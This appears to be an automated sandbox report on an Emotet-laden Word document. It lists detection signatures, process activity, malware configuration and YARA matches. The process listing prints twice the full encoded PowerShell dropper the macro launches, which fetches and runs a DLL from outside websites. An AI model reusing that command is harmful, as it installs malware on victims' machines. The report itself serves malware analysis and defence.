Play interactive tour

Edit tour

Analysis Report info_2020_NJY_31940448.doc

Overview

General Information

Sample Name:	info_2020_NJY_31940448.doc
Analysis ID:	339167
MD5:	e99693721af4330b2f4f0e4ca39f74df
SHA1:	8d5141493dc9e88dd82f55ebbc9c538764127887
SHA256:	c081588672d7e47686d25c4e55de905404749c4ab80a8ba47eb66ceb77c4bc3e
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected Emotet

Creates processes via WMI

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Document contains an embedded VBA with many randomly named variables

Encrypted powershell cmdline option found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Obfuscated command line found

Potential dropper URLs found in powershell memory

PowerShell case anomaly found

Powershell drops PE file

Suspicious powershell command line found

Very long command line found

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 648 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

cmd.exe (PID: 2456 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAKQArACcALwBhACcAKwAoACcAYgAnACsAJwByAGkAbAAnACkAKwAoACcAbABvAGYAJwArACcAdQAnACkAKwAoACcAcgBuAGkAdAAnACsAJwB1ACcAKQArACgAJwByACcAKwAnAGUALgBjACcAKQArACgAJwBvAG0ALwBiACcAKwAnAHAAaAAnACsAJwAtACcAKwAnAG4AYwBsAGUAeAAtAHcAeQAnACsAJwBnACcAKQArACgAJwBxACcAKwAnADQAJwArACcALwBhADcAbgBCACcAKQArACcAZgAnACsAKAAnAGgAcwAnACsAJwAvACcAKQArACcAQAAnACsAJwBdACcAKwAoACcAYgAyACcAKwAnAFsAJwApACsAKAAnAHMAJwArACcAcwA6AC8AJwArACcALwBlAHQAJwArACcAawAnACsAJwBpAG4AZABlAGQAJwApACsAKAAnAGUAawAnACsAJwB0AGkAZgBsAGkAawAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHAAYwAnACsAJwBpAGUALQBzACcAKwAnAHAAJwApACsAJwBlACcAKwAoACcAZQBkAC8AJwArACcAVQAvAEAAXQBiADIAWwAnACsAJwBzAHMAJwApACsAKAAnADoALwAvAHYAcwB0ACcAKwAnAHMAJwArACcAYQAnACkAKwAnAG0AcAAnACsAKAAnAGwAZQAnACsAJwAuAGMAbwBtAC8AdwBwAC0AJwArACcAaQBuAGMAbAAnACsAJwB1AGQAJwArACcAZQBzACcAKwAnAC8AJwArACcANwBlAFgAJwApACsAKAAnAGUASQAnACsAJwAvACcAKwAnAEAAXQBiADIAWwAnACkAKwAnAHMAOgAnACsAJwAvAC8AJwArACgAJwBlAHoAaQAnACsAJwAtAHAAbwBzAC4AYwAnACsAJwBvAG0ALwBjACcAKwAnAGEAdABlAGcAbwByAHkAJwArACcAbAAnACsAJwAvAHgALwAnACkAKQAuACIAcgBFAHAAbABBAGAAYwBlACIAKAAoACcAXQAnACsAKAAnAGIAJwArACcAMgBbAHMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAYABQAGwASQBUACIAKAAkAFIANgA5AEsAIAArACAAJABQAHkAMABlAGIAagBpACAAKwAgACQAUQAzADMASQApADsAJABaADQANABTAD0AKAAoACcARAA4ACcAKwAnADcAJwApACsAJwBPACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVQBqAHQAcwBwAGUAaAAgAGkAbgAgACQATwBnAF8ANAAzAF8AbQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3ACcAKwAnAC0ATwBiACcAKwAnAGoAZQBjAHQAJwApACAAUwB5AFMAdABFAG0ALgBuAGUAVAAuAHcAZQBCAEMAbABJAEUAbgB0ACkALgAiAGQAYABPAFcATgBMAG8AYQBkAEYAaQBgAGwARQAiACgAJABVAGoAdABzAHAAZQBoACwAIAAkAEIAaABuAHcAZQA5ADIAKQA7ACQAWAA3ADAAQgA9ACgAJwBPACcAKwAoACcANAAnACsAJwAwAEgAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAQgBoAG4AdwBlADkAMgApAC4AIgBsAGAAZQBuAGcAVABoACIAIAAtAGcAZQAgADMANwA2ADUAMgApACAAewAmACgAJwByAHUAJwArACcAbgBkACcAKwAnAGwAbAAzADIAJwApACAAJABCAGgAbgB3AGUAOQAyACwAKAAnAEMAJwArACcAbwBuACcAKwAnAHQAJwArACgAJwByAG8AJwArACcAbAAnACsAJwBfAFIAdQBuACcAKQArACgAJwBEACcAKwAnAEwATAAnACkAKQAuACIAVABvAGAAUwBUAHIASQBgAE4AZwAiACgAKQA7ACQATQA0ADcAVwA9ACgAJwBBADcAJwArACcAMQBKACcAKQA7AGIAcgBlAGEAawA7ACQARwA1ADIASgA9ACgAKAAnAEMAJwArACcAMgAwACcAKQArACcAQwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIAMwAzAFQAPQAoACcAUQA5ACcAKwAnADYAVAAnACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

msg.exe (PID: 2496 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)

powershell.exe (PID: 2300 cmdline: POwersheLL -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAKQArACcALwBhACcAKwAoACcAYgAnACsAJwByAGkAbAAnACkAKwAoACcAbABvAGYAJwArACcAdQAnACkAKwAoACcAcgBuAGkAdAAnACsAJwB1ACcAKQArACgAJwByACcAKwAnAGUALgBjACcAKQArACgAJwBvAG0ALwBiACcAKwAnAHAAaAAnACsAJwAtACcAKwAnAG4AYwBsAGUAeAAtAHcAeQAnACsAJwBnACcAKQArACgAJwBxACcAKwAnADQAJwArACcALwBhADcAbgBCACcAKQArACcAZgAnACsAKAAnAGgAcwAnACsAJwAvACcAKQArACcAQAAnACsAJwBdACcAKwAoACcAYgAyACcAKwAnAFsAJwApACsAKAAnAHMAJwArACcAcwA6AC8AJwArACcALwBlAHQAJwArACcAawAnACsAJwBpAG4AZABlAGQAJwApACsAKAAnAGUAawAnACsAJwB0AGkAZgBsAGkAawAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHAAYwAnACsAJwBpAGUALQBzACcAKwAnAHAAJwApACsAJwBlACcAKwAoACcAZQBkAC8AJwArACcAVQAvAEAAXQBiADIAWwAnACsAJwBzAHMAJwApACsAKAAnADoALwAvAHYAcwB0ACcAKwAnAHMAJwArACcAYQAnACkAKwAnAG0AcAAnACsAKAAnAGwAZQAnACsAJwAuAGMAbwBtAC8AdwBwAC0AJwArACcAaQBuAGMAbAAnACsAJwB1AGQAJwArACcAZQBzACcAKwAnAC8AJwArACcANwBlAFgAJwApACsAKAAnAGUASQAnACsAJwAvACcAKwAnAEAAXQBiADIAWwAnACkAKwAnAHMAOgAnACsAJwAvAC8AJwArACgAJwBlAHoAaQAnACsAJwAtAHAAbwBzAC4AYwAnACsAJwBvAG0ALwBjACcAKwAnAGEAdABlAGcAbwByAHkAJwArACcAbAAnACsAJwAvAHgALwAnACkAKQAuACIAcgBFAHAAbABBAGAAYwBlACIAKAAoACcAXQAnACsAKAAnAGIAJwArACcAMgBbAHMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAYABQAGwASQBUACIAKAAkAFIANgA5AEsAIAArACAAJABQAHkAMABlAGIAagBpACAAKwAgACQAUQAzADMASQApADsAJABaADQANABTAD0AKAAoACcARAA4ACcAKwAnADcAJwApACsAJwBPACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVQBqAHQAcwBwAGUAaAAgAGkAbgAgACQATwBnAF8ANAAzAF8AbQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3ACcAKwAnAC0ATwBiACcAKwAnAGoAZQBjAHQAJwApACAAUwB5AFMAdABFAG0ALgBuAGUAVAAuAHcAZQBCAEMAbABJAEUAbgB0ACkALgAiAGQAYABPAFcATgBMAG8AYQBkAEYAaQBgAGwARQAiACgAJABVAGoAdABzAHAAZQBoACwAIAAkAEIAaABuAHcAZQA5ADIAKQA7ACQAWAA3ADAAQgA9ACgAJwBPACcAKwAoACcANAAnACsAJwAwAEgAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAQgBoAG4AdwBlADkAMgApAC4AIgBsAGAAZQBuAGcAVABoACIAIAAtAGcAZQAgADMANwA2ADUAMgApACAAewAmACgAJwByAHUAJwArACcAbgBkACcAKwAnAGwAbAAzADIAJwApACAAJABCAGgAbgB3AGUAOQAyACwAKAAnAEMAJwArACcAbwBuACcAKwAnAHQAJwArACgAJwByAG8AJwArACcAbAAnACsAJwBfAFIAdQBuACcAKQArACgAJwBEACcAKwAnAEwATAAnACkAKQAuACIAVABvAGAAUwBUAHIASQBgAE4AZwAiACgAKQA7ACQATQA0ADcAVwA9ACgAJwBBADcAJwArACcAMQBKACcAKQA7AGIAcgBlAGEAawA7ACQARwA1ADIASgA9ACgAKAAnAEMAJwArACcAMgAwACcAKQArACcAQwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIAMwAzAFQAPQAoACcAUQA5ACcAKwAnADYAVAAnACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)

rundll32.exe (PID: 2548 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2384 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2800 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Slimgulabo\vhtbjtkrz.lpr',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2792 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bvjuzxolryfk\tucwdqbdtfe.wnx',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2748 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bsmdm\ghwk.vcj',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1980 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Anheubolw\yblyupae.she',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2452 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bwaqczxvcucs\mfqhcresmvq.yyb',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2836 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvkklg\owmtf.xpy',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 3068 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eqlmzzdzvxl\jxrtnvzlrw.xix',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 3060 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qjhyis\vvyps.icm',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.2124437516.0000000000161000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.2103844038.00000000003F6000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x1f10:$s1: POwersheLL
0000000F.00000002.2355747254.00000000001D1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2121698890.0000000000190000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2117620078.0000000000250000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2109254352.0000000000261000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000F.00000002.2355718078.00000000001B0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2112719680.0000000000241000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2124305408.0000000000140000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2118054956.00000000006A1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2111015590.0000000000150000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2121760438.00000000001B1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2115003226.00000000001F1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2112674690.0000000000220000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2114888366.0000000000190000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.2103894665.0000000001C16000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x890:$s1: POwersheLL
00000009.00000002.2111121616.00000000001B1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2106786697.00000000001E0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2108974608.0000000000190000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author
8.2.rundll32.exe.190000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.6a0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.150000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.260000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.220000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.190000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.b20000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.220000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.1e0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.1f0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.1e0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1b0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.250000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.150000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.250000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.1d0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.160000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.190000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1b0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.190000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.190000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.140000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.1b0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.240000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.140000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.190000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.1b0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 22 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

